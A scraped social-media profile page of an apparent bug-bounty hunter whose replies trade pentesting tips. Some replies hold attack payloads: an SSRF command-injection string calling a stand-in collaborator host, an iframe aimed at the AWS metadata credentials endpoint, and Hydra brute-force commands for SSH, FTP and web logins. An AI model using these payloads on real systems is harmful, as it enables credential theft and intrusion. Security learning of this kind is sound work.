Usef
@bug4you
Followers
1,561
Following
483
Media
3
Statuses
141
Believe you can and you're halfway there!
127.0.0.1:8989
Joined April 2023
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Nakba
• 245877 Tweets
Robert Fico
• 197269 Tweets
Biden and Trump
• 132066 Tweets
Slovakia
• 122999 Tweets
Peru
• 101701 Tweets
Wicked
• 80642 Tweets
Samurai
• 50663 Tweets
キダ・タローさん
• 48935 Tweets
Assassin's Creed
• 47516 Tweets
Eslovaquia
• 31420 Tweets
Ubisoft
• 30358 Tweets
Yasuke
• 27721 Tweets
浪花のモーツァルト
• 26339 Tweets
Vargas
• 25112 Tweets
Scrap
• 21546 Tweets
$CTA
• 19182 Tweets
Ludmilla
• 18645 Tweets
Ellie
• 18265 Tweets
Ivete
• 13356 Tweets
#FileninSultanları
• 13351 Tweets
Valhalla
• 12751 Tweets
Nitro
• 12397 Tweets
Cádiz
• 11415 Tweets
Galveston
• 11330 Tweets
Juraj Cintula
• 10872 Tweets
Thanksgiving
• 10379 Tweets
Mirage
• 10377 Tweets
@rahuman_hamdi
Pentester land
Medium
Hacker101 Hacktivity
And I suggest reading those blogs of Corben & Sam
@hacker_
:
@samwcyo
:
Those two blogs will take you to the next level.
1
6
20
@spaceboy2O
Have you tried to escalate the SSRF to RCE ?
Give it a hit with:
https://example(.)com/uri/?vulnerable_parameter=http://burpCollaboratore(.)com/?`whoami`
3
5
15
@jancuuckkk
Hey mate, DM me If you are serious and wanna a collab on this, and I’m not king, still learning everyday 😏, and really hoped to gave things back to the community I learnt from, and this the result I took ?
Thanks 😏
0
1
7
2
0
6
@IdoNaor1
hey dude, where's your proof of enjoying taking part in humans, indeed the Israeli Forces enjoy doing this shit, Muslims just want and fight for the land, and you are tweeting shits without any proof, If you need proof of that, I'm tryna DM you with a British telegram Chann...
0
0
4
@AhmadZeindin
They need a security issue on their assets, if you got this through IDOR or other vulnerability, they will consider ur report as a security issue and the fix will be implemented, but if you just got leaked PII Info from the past so what do you expect them to do? Pay you?
1
0
2
@SirBagoza
The Date indicate that it’s an old .git directory bro, were u able to got something sensitive from it?
Is it accepted from you as a valid bug?
1
0
3
@fack02011928
When u are using burp suite and foxyproxy extension for example, All the requests pass to ur burp history and intercept tab, and there are lots of annoyed requests related to some APIs like Google and TikTok and Facebook, for sure you don’t wanna see them, so yeah this filter it.
1
0
2
@AyushSingh1098
Thanks for kind words, hope to gave something to the community I learnt from! 😅
0
0
2
@Reachded
Let’s make it simple for you, what would you do if someone killed ur family and take your land?
I think your thoughts tell me now that you will raise the peace flag and be a kind person with him right?
For me I will chase him until the last breath in my body😊
Do your search more
1
0
2
@M7moud_mk99
sudo hydra -l bob -P /usr/share/wordlists/rockyou.txt -f 10.10.230.23 http-get /test/admin.php/
-f ====> to exit after you find the first correct password.
/test/admin.php/ ====> This is the subdirectory in the website that has the login panel.
1
0
1
@M7moud_mk99
SSH:
hydra -l user -P rockyou.txt 10.10.10.10 ssh -v
FTP:
hydra -l user -P rockyou.txt
ftp://10.10.10.10
-v
the switches (l & p) both of them you can use the lowercase character to provide a single string, and the Uppercase character to provide a list to brute force with it.
1
0
1
@AbdulRa11538162
It depends, is it gives you 200OK With the same response’s body & response’s length when injecting two single quotes?
DM Me with the domain bro, we can collaborate :)
1
0
1
@0xTib3rius
In my perspective I think that the packaged courses will be a good choice for beginners cuz the course will be packaged effectively based on the instructor’s experience, but I don’t think it’s gonna be a good choice or really worth it when it comes to an advanced level :)
0
0
1
@M7moud_mk99
My bad, hashcat is the best one for cracking hashes specially sha-512, however, hydra is good at ssh & ftp if you tryna brute force the login process.
1
0
1
@0x_rood
Nice Catch my friend
1)After pasting the successful JSON body response in the wrong response, when you refresh the browser, are you still taking over that account?
2)is there are any parameters that identify the user or something that gives you the ability to take anyone account?
0
0
1
@MianQas52573653
Manually, wait for writeup if you don’t know how sqlmap works and how it fetches the column numbers, and number of databases, and dumping the version and tables etc…
1
0
0
@ayadiX01
Time Based and Boolean Based and one of them Raised Error containing sensitive data, but It’s landed up Time based not error based with me at the Exploitation Phase, couldn’t differentiate any errors since the same error always returned even when changing the sql injected payload
1
0
1
@M7moud_mk99
until find the correct creds,
Also, keep in mind that (user & pass) is the parameter names in your POST Request, and the ^USER^ & ^PASS^ as a variable that Hydra uses to brute force and put the words that come from the wordlist that you provided. 2)
1
0
1
@Jayesh25_
after pdf export, If you see HTML injection works there.
Must try: <iframe src="
http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-service-role-ssm-codedeploy">
Thanks.
2
10
58
1
0
1
@Yaseen11211
Nope, In most cases all you need is to bypass the WAF or firewall rules, if you able to do so you will be at a position of 90% your crafted payload would work at any parameter, that are not sanitized properly on the same target, or even at the User-Agent header injection!
0
0
1
@M7moud_mk99
sudo hydra -l admin -P rockyou.txt 10.10.7.228 http-post-form "/test/admin.php:user=^USER^&pass=^PASS^:F=Username or password invalid" -V
the statement "Username or password invalid" is kinda of flag to Hydra to know that this invalid response, and keep brute-forcing until 1)
1
0
1
@_2os5
the SELECT query will be a valid query and will return 1 When the database starts with (k) or (i) character, and then since we are doing :
AND (SELECT QUERY)=1
The condition will be true and there will be no error and the server will return the audio file in response.
1
0
0
@koantinometa
@abdlah_md
@Microsoft
Why you didn’t take action and explored the network?
could be there’s some internal IPs with you on the same subnet man, and the most important part are you persisted on the device till now or what?
ping me if you wanna a collab on it if the RCE still working.
0
0
1
@rahuman_hamdi
@hacker_
@samwcyo
I'm talking in general here about the places where I prefer to read writeups as you asked, not about SQLI.
0
0
1